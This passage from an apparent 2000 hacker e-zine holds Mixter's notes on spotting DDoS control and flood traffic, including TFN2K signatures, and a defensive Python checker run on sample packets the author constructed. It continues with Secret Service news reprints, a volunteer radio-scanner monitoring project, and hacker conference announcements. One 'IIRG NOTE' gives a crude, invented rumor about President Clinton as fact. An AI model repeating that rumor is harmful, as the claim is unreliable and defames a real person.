tools, that operate via connectionless raw packets, people will have to start
looking for general signs of DDOS traffic, signs that are obvious and
traffic that is extensively anomalous and suspicious.
There are two kinds of DDOS-generated traffic, control traffic (between DDOS
client and servers) and flood traffic (between DDOS servers and DDOS victim).
Credits to rain forest puppy, Dave Dittrich, and Axent Security Team
for providing some initial hints I needed to write this up.
Anomaly 0: This is not real "DDOS" traffic, but it can be a viable method
of determining the origin of DDOS attacks. As observed by RFP, an attacker
will have to resolve his victim's hostname before a DDOS attack. BIND name
servers are capable of recording these requests. You can either send them
a WINCH signal with 'kill', or you can specify query logging in the BIND
configuration. A single PTR type query before an attack indicates the request
was made from the attacker's host; a great load of PTR type queries for a
DDOS victim before an attack indicates that the flood servers have been
fed a host name and each server was resolving the hostname for itself.
Anomaly 1: Amount of bandwidth exceeds the maximum threshold that
expected normal traffic for a site could cause. Alternatively, the
threshold can be measured in the number of different source addresses
in the traffic. These are clear signs of flood traffic and ACL rules can be
implemented on the backbone routers that detect these signs and filter traffic.
Anomaly 2: Oversized ICMP and UDP packets. Stateful UDP sessions are
normally using small UDP packets, having a payload of not more than 10
bytes. Normal ICMP messages don't exceed 64 to 128 bytes. Packets that
are reasonably bigger are suspicious of containing control traffic, mostly
the encrypted target(s) and other options for the DDOS server. Once
(non-decoy) control traffic is spotted, one of the DDOS servers' location
is revealed, as the destination IP address is not spoofed in control traffic.
Anomaly 3: TCP packets (and UDP packets) that are not part of a connection.
The stealthiest DDOS tools use random protocols, including connection-oriented
protocols, to send data over non-connection-oriented channels. Using stateful
firewalls or link-state routing can discover these packets. Additionally,
packets that indicate connection requests with destination ports above 1024,
with which no known service is registered and running, are highly suspicious.
Anomaly 4: Packet payload contains ONLY alphanumeric characters (e.g. no
spaces, punctuation, control characters). This can be a sign that the packet
payload is BASE64-encoded, and therefore contains only base64 characters.
TFN2K is sending such packets in its control traffic. A TFN2K (and TFN2K
derivatives) specific pattern is a string of repeating A's (AAAA...) in
the payload, since the buffer size is padded by the encryption routine. If
the BASE64 encoding is not used, and the payload contains binary encrypted
traffic, the A's will be trailing binary \0's.
Anomaly 5: Packet payload contains ONLY binary, high-bit characters. While
this can be a binary file transfer (traffic transmitted over ports 20, 21,
80, etc. must be excluded if this rule is applied), especially if contained
in packets that are not part of valid stateful traffic, it is suspicious
of being non-base64 encoded, but encrypted control traffic that is being
transmitted in the packet payload.
- Mixter
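Added example, not part of the original article: the payload checks from
Anomalies 2, 4 and 5 applied to four constructed packets, with the session
verdict of Anomaly 3 taken as an input. The Packet record, the 16-byte
minimum, the 8-character padding run and the triage labels are assumptions;
the size limits and excluded ports are the ones quoted in the text.

```python
import base64
import re
import string
from dataclasses import dataclass

B64_CHARS = frozenset((string.ascii_letters + string.digits + "+/=").encode())
EXCLUDED_PORTS = frozenset({20, 21, 80})  # ports the text excludes for Anomaly 5
SIZE_LIMITS = {"icmp": 128, "udp": 10}    # payload sizes quoted in Anomaly 2


@dataclass(frozen=True)
class Packet:               # hypothetical record filled by a capture front end
    proto: str              # "icmp", "udp" or "tcp"
    dport: int              # 0 for ICMP
    payload: bytes
    in_session: bool        # verdict of a stateful tracker (Anomaly 3), assumed


def content_findings(pkt, pad_run, highbit_min):
    """Anomaly 4 (base64-only) and Anomaly 5 (binary-only) payload checks."""
    p = pkt.payload
    if all(b in B64_CHARS for b in p):
        found = ["A4:base64-only"]
        # Base64 of zero padding is a run of 'A', the marker the text
        # attributes to TFN2K control traffic.
        if re.search(rb"A{%d,}" % pad_run, p):
            found.append("A4:A-padding")
        return found
    nul = len(p) - len(p.rstrip(b"\x00"))   # trailing \0 padding, if any
    body = p[:len(p) - nul]
    if pkt.dport in EXCLUDED_PORTS or not body:
        return []
    # The text's rule is "ONLY high-bit" (ratio 1.0). Uniformly random
    # ciphertext sets the high bit on about half its bytes, so highbit_min
    # is a tunable rather than a constant.
    ratio = sum(b >= 0x80 for b in body) / len(body)
    if ratio < highbit_min:
        return []
    found = ["A5:binary-only"]
    if nul >= pad_run:
        found.append("A5:nul-padding")
    return found


def examine(pkt, min_len=16, pad_run=8, highbit_min=1.0):
    """Return the list of anomaly tags raised by one packet."""
    findings = []
    limit = SIZE_LIMITS.get(pkt.proto)
    if limit is not None and len(pkt.payload) > limit:
        findings.append("A2:oversized-" + pkt.proto)
    if len(pkt.payload) >= min_len:       # too short: skip content checks
        findings += content_findings(pkt, pad_run, highbit_min)
    if not pkt.in_session:
        findings.append("A3:no-session")
    return findings


def triage(pkt):
    """alert on a padding marker, review on any other tag, else pass."""
    findings = examine(pkt)
    if any(tag.endswith("-padding") for tag in findings):
        return "alert"
    return "review" if findings else "pass"


# Constructed sample packets (no captured traffic).
SAMPLES = [
    # base64 control-style datagram: 12 data bytes plus 24 bytes of zero padding
    Packet("udp", 40000, base64.b64encode(bytes(range(0x90, 0x9C)) + bytes(24)), False),
    # binary payload with trailing \0 padding carried in ICMP
    Packet("icmp", 0, bytes(range(0x80, 0xC0)) + bytes(16), False),
    # ordinary web request inside a tracked connection
    Packet("tcp", 80, b"GET /index.html HTTP/1.0\r\n\r\n", True),
    # alphabetic fill of the kind some ping implementations send
    Packet("icmp", 0, b"abcdefghijklmnopqrstuvwabcdefghi", True),
]

if __name__ == "__main__":
    for pkt in SAMPLES:
        print(pkt.proto, pkt.dport, triage(pkt), examine(pkt))
```

The last sample shows why the alphanumeric-only test alone is weak: a
letters-only ping fill raises A4 without the padding marker.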
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [6]: The Nazi Files (Stories of the SS)
Compiled By: The IIRG
-------------------------------------------------------------------------------
DISCORD IN THE SECRET SERVICE RANKS?
Black Secret Service Agents To Sue for Discrimination
By Gregory Vistica and Debra Rosenberg
Newsweek, February 22, 2000
On Wednesday, lawyers for 50 African-American Secret Service agents,
including several who have guarded the First Family, prepared to file a
class-action suit with the Equal Employment Opportunity Commission in
Washington. The suit will claim that blacks are discriminated against in the
agency's promotion process, according to lawyers representing the agents,
and will also allege that too few blacks hold Secret Service management
jobs.
The class action is an unusual public airing of complaints by employees of a
necessarily secretive agency. The complaint will be filed first at the
Department of Treasury, which oversees the Secret Service, before proceeding
to the EEOC for review. To further try to correct what they view as a
pattern of racial bias by their employer, several agents are now working to
establish a formal association called BASS - Black Agents in the Secret
Service - that will represent the rights of minorities. One agent involved
with BASS says that as many as 100 African-American agents have expressed
interest in joining the group.
On Thursday, Secret Service agents involved in the class action are
scheduled to hold a press conference with their lawyers at the National
Press Club. They plan to describe the hurdles they have faced in their
efforts to be promoted and to discuss the everyday difficulties for blacks
in an organization that is predominantly white, says their attorney, David
Shaffer, of Thelen Reid & Priest. Shaffer successfully represented minority
FBI agents in their 1991 class-action suit against the law-enforcement
bureau. Shaffer's co-counsel is John Relman and Associates, the law firm
that represented black Secret Service agents in their lawsuit against
Denny's restaurants.
Shaffer describes those in charge of the agency's promotion process as
"good-old boys" who consistently help their white friends win better jobs at
the expense of qualified African Americans. He says the majority of Secret
Service agents, black and white, score in the 90th percentile in
job-performance rankings. Because of this, Shaffer says, personal
relationships among managers, the majority of whom are white, are the key
factor in who gets rewarded with a management job. "You have to know the
higher-ups," Shaffer says, if you want to win a promotion.
There are approximately 2,300 non-uniformed agents who work around the
world; some 200 of those agents are black, Shaffer says. But African
Americans hold just 22 management jobs. Agents complain that all but a few
of the top management jobs in large U.S. cities, including New York, Los
Angeles and Chicago, are held by white agents. The exceptions, they say, are
Atlanta and Dallas, cities in which blacks have had senior postings in the
past.
"Certainly we're concerned," says Jim Mackin, a spokesman for the Secret
Service. By late Wednesday, he said the agency had not yet received a copy
of the complaint. Mackin said that the Secret Service has tried to maintain
a diverse work force and provided some statistics that show black agents
have indeed held senior posts. Of the seven assistant directors, two are
African-American, he said. In addition Mackin said black agents head four of
the eleven largest field offices.
A number of black agents who have worked on President Clinton's security
detail could join the suit. Among them is Reginald Moore. Shaffer says Moore
was passed over for the job of director of the Secret Service's operations
center, though he was serving as its acting director. The man who got the
job, says Shaffer, was white and was not as qualified as Moore, who was then
transferred to the Dallas field office. Moore couldn't be reached for
comment. Then there's Larry Cockell, formerly the lead agent on President
Clinton's secret service detail, who was forced to testify by Ken Starr, the
independent prosecutor. Cockell was reportedly in the running to be head of
the Secret Service, but lost out to another candidate. Through Mackin,
Cockell says he "is in no way associated with the complaint" and has no
further comment.
The lawsuit may prove to be something of an embarrassment to the Clinton
administration, which has made a concerted effort to court blacks for top
jobs. Unfortunately, perhaps, for his security detail, the president has no
power over which agents win promotions.
-----------------------------------------------------------------------------
CLINTON EVACUATED FROM HOTEL AFTER FIRE ALARM
Friday February 25, 3:06 pm Eastern Time
Clinton evacuated from hotel after fire alarm
WASHINGTON, Feb 25 (Reuters)
U.S. President Bill Clinton was evacuated from a Washington hotel along with
about 800 people attending an awards ceremony on Friday after a fire alarm
went off.
Clinton joked about the buzzing that began just as he started speaking at the
event in a hotel ballroom. But when three fire officials entered the room, the
Secret Service decided to evacuate the president and others.
The president was escorted outside, got in his limousine and left the hotel in
his motorcade for the White House. It was not immediately clear if there really
was a fire.
The fire alarm first started while Secretary of Commerce William Daley was
speaking but stopped for a few minutes before Clinton started to speak.
The president spoke through the fire alarm for a few minutes, apparently
expecting the buzz to stop. ``Somebody tell me what the deal is. Is it a fire
alarm, are we supposed to leave? Not yet...that's not an encouraging answer,''
he said to laughter.
``Unless somebody starts singing 'Smoke gets in your eyes' we may just start and
go on,'' he said. A few moments later he broke away from his speech to say:
``They're coming to get us. It really is a fire alarm... Thank you.''
IIRG NOTE - In a private interview with a hotel staff employee, it was
learned that Secret Service decided to evacuate the president because he
apparently soiled his pants upon hearing the fire alarm.
He was rushed to the limousine after Secret Service agents grabbed several
hotel bath towels in an attempt to hide the president's "accident".
Our contact claims hotel staff was sworn to secrecy and that several
Secret Service agents returned to the hotel afterwards to retrieve
the bath towels. One agent was heard muttering, "We need those god damned
towels. After Monica's dress we don't need any more physical evidence."
-----------------------------------------------------------------------------
SECRET SERVICE HARASSING BERNIE S AGAIN
03/17/00
Five years to the day after Bernie S. was arrested at gunpoint and subjected
to nearly 17 months of imprisonment by the United States Secret Service,
agents of the USSS have again begun some kind of cat and mouse game, the
nature of which has yet to be revealed.
A Special Agent from the Secret Service showed up unannounced at Bernie's
workplace and told his employer they wanted to question Bernie, who happened
to be out sick that day. When Bernie returned to work the following day and
discovered the Secret Service wanted to talk to him, he surprised the agent
by calling him. What followed was an extremely strange and circular
conversation.
At first the SS agent wouldn't talk to him at all. Then he called Bernie
back and said they needed to talk with him at his home at 7am the next
morning. When Bernie explained he was just getting over a serious illness
and that this was an unreasonable hour, the agent suggested 6am.
Bernie repeatedly offered to answer their questions at several neutral
locations, but they said any place other than his home was unacceptable.
Bernie told them he had nothing to hide, but that he was not comfortable
having Secret Service agents poking around inside his house and that they
would have to get a warrant before he'd let them in. The agent then said he
had to go and would talk to him later.
About ten minutes later, a second, more polished, SS agent called Bernie and
continued trying to persuade him to let them inside his home. The agent tried
to goad Bernie by implying he must have something to hide, and that if he
didn't then there was no reason why they shouldn't be allowed inside his
home. At this point, Bernie tried to explain by saying if you asked 100
people on the street if they'd want federal agents in their living room and
bedroom, almost everyone would say no and that he was no exception. The SS
agent disagreed, saying people have no legitimate fears about such a visit.
Bernie repeatedly tried to get the SS agents to tell him what they wanted.
Finally, the second agent said, "I need to check to see if your telephone
and Cable TV wiring is hooked up properly." This preposterous claim made
Bernie actually laugh out loud. But as a further gesture of cooperation,
Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to
inspect his house wiring for them. The SS agents said that, too, would be
unacceptable. It became clear the SS agents were simply trying anything they
could to get a foot in his door. Needless to say, after Bernie's previous
horrendous experience with the Secret Service, their feet are not welcome in
his home. He then gave them his attorney's name and telephone number and told
them to address future inquiries directly to his lawyer.
So what is this all about? We don't know yet, but clearly something is up.
And the way the Secret Service has played sick games with people's lives in
the past, we felt it would be wise to alert everyone now so we can all keep a
closer eye on them before they try any further outrageous actions under the
veil of secrecy.
-------------------------------------------------------------------------------
Friday March 17, 2000; 3:10 PM EST
Hillary's Secret Service Agents Rough Up Reporters as St. Pat's Crowd Boos
Secret Service agents protecting first lady Hillary Clinton
roughed up several reporters along the route of New York
City's St. Patrick's Day parade, WABC Radio reported Friday
afternoon.
To make matters worse, the United States Senate candidate was
booed at several points along the Fifth Avenue parade route. A
crowd of holiday revelers gathered at St. Patrick's Cathedral
shouted "Go back to Arkansas" and "Find your own state."
"Secret Service agents literally are pushing press to the
ground," reported WABC's Glenn Shuck. "They get back up again.
Mrs. Clinton stops to shake hands again along the route and
she's mobbed again by Secret Service." According to Shuck,
Mrs. Clinton's security got rough with reporters at several
points along the parade route.
"At one point one (Secret Service agent) grabbed me on my
right side with his hands, and kind of grabbed my coat to hold
me back, definitely forcefully," Shuck told afternoon
drivetime talk show host Sean Hannity.
"The Secret Service just lost their minds, in my opinion,"
said Shuck. "I mean they just started pushing and shoving;
female camera people five feet tall were getting thrown to the
ground, cameras flying. Myself, I was grabbed by the shoulder,
I was thrown back over. I think somebody from Channel 11
landed on my back. From that point it really didn't get any
better."
Minutes after Shuck's interview with Hannity, WABC's in-studio
reporter George Webber announced, "Hillary Clinton's Secret
Service agents today roughed up several members of the news
media trying to cover the first lady's visit to the St.
Patrick's Day parade. At least six reporters, including WABC's
Glen Shuck, were pushed and tossed to the ground as they tried
to get quotes from Mrs. Clinton."
The first lady's reaction:
"I love being a New Yorker. And this is the first time I've
been able to march in this parade as a New Yorker. I could not
be happier to be here."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [7]: IIRG Signal Intelligence (SIGINT) Guidelines
By: Black IC <black_ic@iirg.org>
- BEGIN PROJECT -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
////// ////// /////// ////////
// // // // //
// // /////// // ////
// // // // // //
////// * ////// * // // * /////////
The International Information Retrieval Guild
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The International Information Retrieval Guild
Signal Intelligence (SIGINT) Guidelines
Rev. 1-2000-2-A
Part A: Summary
The purpose of this project is to confirm publicly available frequency
lists and update frequency listing and usage on undisclosed frequencies.
Part B: Requirements
1. Scanner with or as close to the following ranges:
27 - 54.000 MHz
108 - 136.975 MHz
137 - 174.000 MHz
406 - 512.000 MHz
806 - 823.937 MHz
851 - 868.937 MHz
896 - 956.000 MHz
2. Good antennae with good reception.
3. Working knowledge of "your" scanner.
4. Commitment and patience in terms of monitoring.
5. Commitment and initiative in terms of documenting.
6. We need to know your general area of living. (i.e. North East,
Mid-West). Though some frequencies are national some are localized and
this will allow us to cater to your area. Also knowing your scanner's
make and model will help in giving you frequency lists that you can
work with.
Part C: Procedures
You will receive a list of frequencies in order of priority that you will
monitor. These frequencies will have a duration period on how long you
will monitor and possibly what times. When you are done monitoring you
will move to the next frequency. Upon completion of your list please
submit your findings to black_ic@iirg.org
Please find enclosed your documentation procedures and frequency list
catered to your capabilities. Due to FCC regulations we are not
interested in the content of the traffic other than the parties involved
and at what times they were involved. Though FCC frequency allocations
are public the parties they are reserved for change their usage and
sometimes use undisclosed frequencies that are not listed in the public
sector.
1. Tune in to initial frequency on list.
2. Adjust reception and squelch as needed.
3. Listen to said frequency for instructed time at instructed time.
4. Document any traffic using the following notations:
A. Time (Military Time; GMT, EST, etc.)
B. Parties Involved (FBI, Media, PD, Pager)
C. Code & Signals
D. Duration of Transmission
Part D: Personal SIGINT Frequencies:
<Will be e-mailed>
The IIRG'00
May Odin Guide Your Way...
- END PROJECT -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [8]: The Rumor Mill
-----------------------------------------------------------------------------
THIS IS THE OFFICIAL ANNOUNCEMENT FOR THE SECOND ANNUAL RUBI CON GROUP
DATA AND NETWORK SECURITY CONFERENCE
AKA
RUBI CON 2000
Last updated on 2/23/2000
----------------------------------------------------------------------|
| ____ __ ______ ____ __________ _ __ |
| / __ \/ / / / __ )/ _/ / ____/ __ \/ | / / |
| / /_/ / / / / __ |/ / / / / / / / |/ / |
| / , _/ /_/ / /_/ // / / /___/ /_/ / /| / |
| /_/ |_|\____/_____/___/ \_____\____/_/___/ ___ ___ |
| |_ | / _ \ / _ \ / _ \|
|************************************/ __/****/ // /***/ // /***/ // /|
| /____/ \___/ \___/ \___/ |
|----------------------------------------------------------------------
-----------------------------------------------------------------------
Who: IT professionals and computer hackers
What: Three days of speakers, classes, games, and more
Where: Romulus, Michigan
Why: To teach, to learn, to understand
When: April 28-30, 2000 (Friday, Saturday, Sunday)
Cost: $100.00, $40.00 for students
Info: http://www.rubi-con.org
-----------------------------------------------------------------------
1. Rubi Con 2000 is a data and network security conference held annually
in metro Detroit. Three days of expert speakers, workshops, games and
contests, all with a casual, open atmosphere and a very unique goal. Our
intention is to bring together the two sides of system security: those on
the outside trying to get in, and those on the inside trying to keep
everyone else out. In the real world, it's IT professionals and security
experts versus "underground" crackers and computer hackers. These two
sides have much more in common than they often realize, and can learn more
from being in each other's presence than they might believe. Rubi Con is
here to bring them into contact with each other.
But we exist to provide information rather than an ideology. For while you
may learn how to break into computers at Rubi Con, you will also learn how
to fortify and defend them. We do not endorse illegal activity, only the
value of information.
2. Rubi Con offers three full days of expert speakers in both large group
and intimate classroom settings. Rubi Con speakers will offer sessions on
such diverse topics as advanced AS/400 security measures and the
philosophy of the modern computer hacker. All sessions are intended to be
highly interactive; questions and dialogue are encouraged to create a more
intimate and friendly atmosphere. Our speakers are professionals and
experts in their fields, many have Ph.D.s and nearly all have been
involved in information technology for decades.
We also offer unique games and contests to test your knowledge. Our
hacking contest is a race to break into secure network servers. Trivia
games offer fun prizes in exchange for obscure information. Do you have a
duck? You will if you play our (in)famous scavenger hunt.
3. Rubi Con occurs yearly in the metro Detroit area. This year we will
be at the Wyndham Garden Hotel in Romulus Michigan, right at Detroit
Metro Airport. The hotel is at 8600 Merriman Road, Romulus, MI 48174,
United States. You can contact them at (313) 728-7900, or for reservations
at (877) 999-3223. Wyndham Hotels has a web site here:
http://www.wyndham.com. Rooms have been reduced to $80.00 per night for
our group. Mention Rubi Con to receive the discount. The Wyndham requires
that rooms be rented by credit card only, no cash unless you are over 21.
See someone here if you are under 21 and are having trouble renting a
room.
4. Rubi Con 2000 will occur Friday, April 28, Saturday, April 29, and
Sunday, April 30, 2000. The conference will run 24 hours a day, and enough
caffeine will be kept on hand for those who want to run 24 hours a day,
too. Registration begins at 3:00 PM on Friday. We shut our doors late on
Sunday, and all classes will run during the day, between the hours of
11:00 AM and 7:00 PM.
5. Tickets are $100.00, or $40.00 for students. Advanced tickets will cost
$90.00 and $30.00, respectively. See our website for details on ordering
tickets now. Advanced tickets will not be accepted after March 28, or one
month prior to Rubi Con. The cost of a ticket covers all events, classes and
speakers at Rubi Con 2000. You get a professional looking ID badge, and
perhaps other goodies. Swanky RC2K T-shirts sold separately.
-----------------------------------------------------------------------
OTHER INFORMATION:
http://www.rubi-con.org
info@rubi-con.org
tickets@rubi-con.org
The above URL is the official Rubi Con web site. It contains all pertinent
information about this event such as current speaker listings and topics,
event schedules, information on games and contests, advanced ticket sales,
and more. The above email addresses are intended for general information
and ticket questions, respectively. Both are monitored by living,
breathing humans at all times.
-----------------------------------------------------------------------
CALL FOR SUPPORT:
We are always receptive to more speakers and presenters. If you have any
interest in teaching something at the next Rubi Con, contact our
operations director at tantalo@rubi-con.org. We are looking for people
with a background in information technology and with an interest in data
security. If this is you, send us a message.
If you think you or your company may be interested in donating resources
or equipment to Rubi Con 2000, please contact our business director at
deline@rubi-con.org. We are looking for support from companies with
network bandwidth, guest speakers, equipment, advertisement/promotional
materials, and any other contributions. If you or your company wants to
help make Rubi Con 2000 happen, send us a message.
-----------------------------------------------------------------------
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
]]]]]]]]]]]]]]]]]] ]]] ]] ] ]] DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]]]] ]] ] ] DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]] ] ] ] DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]] ]] ] DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]] ] ]]]]]]]] ] DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]]] ] DEF CON 8 Initial Announcement
]]^^^^^^^^^^^^^^]]]]]] ]] ] DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]] DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]]]]]]] ] ]] DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]]]] ]]] ]] ] DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]]]] ] ] ] DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]] ]] ] ] DEF CON 8 Initial Announcement
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ] DEF CON 8 Initial Announcement
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
WTF is this? This is the initial announcement and invitation to DEF CON 00,
a convention for the "underground" elements of the computer culture. We try
to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
Virii coders, programmers, crackers, Cyberpunk Wannabes, Civil Liberties
Groups, CypherPunks, Futurists, etc..
WHO: You know who you are, you shady characters.
WHAT: A convention for you to meet, party, and listen to some speeches that
you would normally never hear.
WHEN: July 28th - 30th, 2000
WHERE: Las Vegas, Nevada @ Alexis Park Resort
What is DEF CON?
DEF CON is an annual computer underground party for hackers held in Las Vegas,
Nevada, every summer for the past six years. Over those years it has grown in
size, and attracted people from all over the planet. Well, no one from
North Korea has shown up (that we know of) but if they did I'm sure we would
convince them to tell us elite government secrets. That's what it is all
about. Meeting other spies, er, people and learning something new.
We are not trying to teach you to learn how to hack in a weekend, but what we
are trying to do is create an environment where you can hang out with people
from all different backgrounds. All of them interested in the same thing,
computer security. To do this we have taken over the complete hotel at the
Alexis Park Resort. Does all of this seem interesting? Then it can be yours
for the low, low price of only $50 at the door.
If you want a greater idea of what it is all about, and what other people
have had to say about the convention please visit the previous year's
archives sections and read what the media and attendees have had to say.
There has been an awful lot of press written about DEF CON over the years.
Some of it good, most of it too fixated on the attendees' green hair.
If you want to see what people have written, check out the previous years'
archives for the links.
Current Speakers
----------------
There is currently a call for speakers.
Please email DTangent if you want to exhibit, or sponsor DEF CON 8
------------------------------------------------------------------
Gregory B. White, Ph.D.
The USAFA Cadet Hacking Case:
What both sides should learn about computer forensics
Basically I'll discuss the case that went to trial in the spring of
99. I was the Deputy Head of the Computer Science Department at the
USAF Academy at the time and was asked by the cadet accused of "hacking"
to help with his defense. I testified at the trial as an expert witness
for the Defense. I sat at the Defense table throughout the trial serving
as their "computer expert". Basically the trial was a comedy of errors
by the prosecution, law enforcement, and the cadet's attorneys alike.
The cadet was involved in IRC but the law enforcement types and prosecution
became convinced that he was the "hacker" (after all, everybody KNOWS
that IRC is nothing more than a place for hackers to trade information
on how to break into computers -- the actual sentiment expressed by
the investigators). I had up to that point spent the majority of my
time in the Air Force trying to protect systems and to catch those who
broke into AF systems. This case really shook me as I saw the LE types
latch onto the smallest of indicators and blow them into a full blown
felony case (the cadet faced 15 years in Leavenworth had he been convicted
of all counts). What I will cover in the talk is:
1) Background of the case 2) The "evidence" the prosecution thought
they had 3) The many possible areas where clues might have been found
had either side known where to look (or asked anybody who knew anything
about it) 4) What lessons can be learned from this case. Those from
the government and industry need to know where to look if they want
to catch folks (and if they want to make sure they don't make fools
of themselves) and those who might find themselves accused someday need
to know how to help their attorneys find clues that could exonerate
them.
Gregory B. White, Ph.D. - Vice President, Professional Services. Gregory
White joined SecureLogix in March 1999 as the Chief Technology Officer.
Before joining SecureLogix, he was the Deputy Head of the Computer
Science Department and an Associate Professor of Computer Science at
the United States Air Force Academy in Colorado Springs, Colorado.
While at the Academy, Dr. White was instrumental in the development
of two courses on computer security and information warfare and in ensuring
that security was taught throughout the computer science curriculum.
During his two tours at the Academy, he authored a number of papers
on security and information warfare and is a co-author for two textbooks
on computer security.
Between his Air Force Academy assignments, Dr. White spent three years
at Texas A&M University working on his Ph.D. in computer science. His
dissertation topic was in the area of host- and network-based intrusion
detection. Prior to his Academy assignments, Dr. White was a student
at the Air Force's Advanced Communications-Computer Systems Staff Officer
Course in Biloxi, Mississippi. He was awarded both the AFCEA and Webb
awards for student leadership and academic excellence and was a Distinguished
Graduate of the course. Before attending the course in Biloxi, Dr.
White served as the Branch Chief of the Network Security Branch at the
Cryptologic Support Center in San Antonio, Texas. His first assignment
in the Air Force was as a systems analyst at the Strategic Air Command
Headquarters in Omaha, Nebraska. Dr. White obtained his Ph.D. in Computer
Science from Texas A&M University in 1995. He received his Masters
in Computer Engineering from the Air Force Institute of Technology in
1986 and his Bachelors in Computer Science from Brigham Young University
in 1980. He separated from the Air Force in 1999 and is currently serving
in the Air Force Reserves at the Defense Information Systems Agency.
Ron Moritz, Chief Technology Officer Finjan Software, Inc.
Proactive Defense Against Malicious Code
Anti-virus software is an important part of a well-devised security
policy, but reactive virus detection is not versatile enough for the
demands that will be made on businesses engaged in e-commerce. The year
1999 began with the birth of the Happy 99 virus - a harbinger of things
to come. Happy 99, plus Melissa, PrettyPark and the Explore.zip worm
are all examples of third generation of malicious replicating code,
designed to exploit the Internet for their rapid proliferation. A variant
of Explore.zip, called MiniZip, managed to hide itself from antiviral
utilities and spread at an amazing rate around the Internet at the end
of 1999. Such programs, which launch new malicious code attacks, create
"first strikes" against systems and networks. Allowing untrusted code
to execute on the corporate network may not be suitable for your organization.
But corporate security policies that block network executables adversely
affect the evolution of the Internet, extranet, and intranet. While
no security implementation is absolute, functionality is not achieved
by disconnecting users from the network and preventing access to programs.
Therefore, proactive defense against first-strike attacks is required
today.
Almost all web sites today contain mobile code. Many of the powerful
business (ecommerce) applications you need and use are written with
mobile code. Consequently, net-enabled malicious software is likely
to increase in prevalence and successful utilization. The factors accounting
for such a prediction are the ease by which users are duped into double-clicking
on malicious e-mail attachments, and the ease by which the sources
of those e-mails are automatically spoofed to seem to come from a boss
or from an e-mail or instant message friend. Traditional pattern matching
approaches are incomplete, out-of-date, and ineffective and were never
designed to prevent a series of new generation attacks based on malicious
mobile code and Trojan executables.
Ron Moritz is the Chief Technology Officer at Finjan Software where
he serves as primary technology visionary. As a key member of the senior
management team interfacing between sales, marketing, product management,
and product development, Ron helps establish and maintain the company's
technological standards and preserve the company's leadership role as
a developer of advanced Internet security solutions. Ron was instrumental
in the organization of Finjan's Java Security Alliance and established
and chairs Finjan's Technical Advisory Board. He is currently chairing
the Common Content Inspection API industry standards initiative. Ron
is one of a select group of Certified Information Systems Security Professionals.
He earned his M.S.E., M.B.A., and B.A. from Case Western Reserve University
in Cleveland, Ohio.
WHERE THIS THING IS:
--------------------
It's in Las Vegas, the town that never sleeps. Really. There are no clocks
anywhere in an attempt to lull you into believing the day never ends. Talk
about virtual reality, this place fits the bill with no clunky hardware. If
you have a buzz you may never know the difference. It will be at the Sahara
Hotel. Intel as follows:
Hotel Location
The Convention will be held at the Alexis Park Hotel and Resort
We are taking over the complete hotel!
The Alexis Park Hotel and Resort is across the street from the Hard
Rock Hotel, and is a block off the main strip. Located at 375 E Harmon
Ave in Las Vegas, NV 89109. The Alexis Park is a non gambling hotel,
so people 18 years and older can get a room there. This is the first
time that has ever happened for us! If there are any problems with
this please email me!
HOTEL COSTS: Room rates are 85$ for a two bed suite, but you can get
up to four people in one.
RESERVATIONS: On-line or by phone: 800-453-8000
We have the whole hotel space, so unless you reference the DEF CON show
the Alexis Park will tell you they are sold out.
We have all the rooms at the Alexis Park, and a bunch next door at the
San Tropez. We are working on a block of rooms at the Hard Rock Hotel.
At last count about 20% of the rooms at the Alexis Park were already
booked. Sign up early if you want to stay at the main hotel!
We start Friday, but many people get in Thursday night and hang out
before the fun begins. We get our convention room rate from Wednesday
night through Monday night for those wanting to stay longer to check
out the attractions.
Cheap Airfare Information
We've got great discounts on airfare from Montrose Travel, who book
bulk air travel for cheap. If you need to still book tickets give these
guys a call first and compare.
Montrose Travel 1-800-301-9673
http://www.montrosetravel.com
or email Montrose Travel with questions.
They currently have deals for DEF CON attendees from the US and International
on the following airlines:
America West Southwest Delta
American Southwest Airlines United Airlines
and other smaller carriers and even International Airfare rates.
Expect rates lower than published. When calling make sure you refer
to DEF CON as the group name.
COST:
Cost is whatever you pay for a hotel room split however many ways, plus
$50.00 at the door. There are fast food places all over, and there is
alcohol all over the place, the trick is to get it during a happy hour
for maximum cheapness.
-----------------------------------------------------------------------------
Hope 2000 is Coming.
http://www.h2k.net
July 14th to July 16th, 2000.
New York City
-----------------------------------------------------------------------------
Postcards From The Edge BBS
Formerly a Renegade DOS Based Dial-Up BBS, PFTE is now and has been available
via telnet at luna.iirg.org
PFTE carries an eclectic topic structure surrounding SIGINT, Telephony, RF
Hacking, UNIX, Kit Bashing, and others. No restrictions on
applying. Just log in and be a part of an ongoing history surrounding this
board.
The present life of this board is running Citadel. You can access this
system via telnet or the web.
www.iirg.org/pfte.html
luna.iirg.org
Login: bbs
Password: <enter>
Any questions: black_ic@iirg.org
